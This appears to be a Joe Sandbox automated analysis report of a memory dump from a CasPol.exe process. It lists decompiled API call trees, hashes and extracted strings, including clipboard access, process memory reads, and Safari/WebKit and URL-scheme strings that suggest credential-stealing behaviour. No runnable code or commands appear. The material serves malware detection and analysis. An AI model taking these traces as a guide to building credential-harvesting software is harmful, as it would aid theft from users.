                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                              • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004095FC
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3655998216-0
                                                                                                                                                              • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                              • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00445426
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1828521557-0
                                                                                                                                                              • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                              • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2081463915-0
                                                                                                                                                              • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                              • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2136311172-0
                                                                                                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1936579350-0
                                                                                                                                                              • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                              • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                              • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                              • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                              • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                              • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                              APIs
                                                                                                                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                              • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3604893535-0
                                                                                                                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                              APIs
                                                                                                                                                              • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                              • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                              • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1213725291-0
                                                                                                                                                              • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                              • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                              • free.MSVCRT ref: 00418370
                                                                                                                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                              • String ID: OsError 0x%x (%u)
                                                                                                                                                              • API String ID: 2360000266-2664311388
                                                                                                                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                              APIs
                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Version
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1889659487-0
                                                                                                                                                              • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                              • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                              • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                              • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                              APIs
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                              • memset.MSVCRT ref: 0040265F
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                              • API String ID: 577499730-1134094380
                                                                                                                                                              • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                              • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                              • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                              • API String ID: 2787044678-1921111777
                                                                                                                                                              • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                              • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                              • GetDC.USER32 ref: 004140E3
                                                                                                                                                              • wcslen.MSVCRT ref: 00414123
                                                                                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                              • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                                                                                              • API String ID: 2080319088-3046471546
                                                                                                                                                              • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                              • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                              APIs
                                                                                                                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                              • memset.MSVCRT ref: 00413292
                                                                                                                                                              • memset.MSVCRT ref: 004132B4
                                                                                                                                                              • memset.MSVCRT ref: 004132CD
                                                                                                                                                              • memset.MSVCRT ref: 004132E1
                                                                                                                                                              • memset.MSVCRT ref: 004132FB
                                                                                                                                                              • memset.MSVCRT ref: 00413310
                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                              • memset.MSVCRT ref: 004133C0
                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                              • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                              Strings
                                                                                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
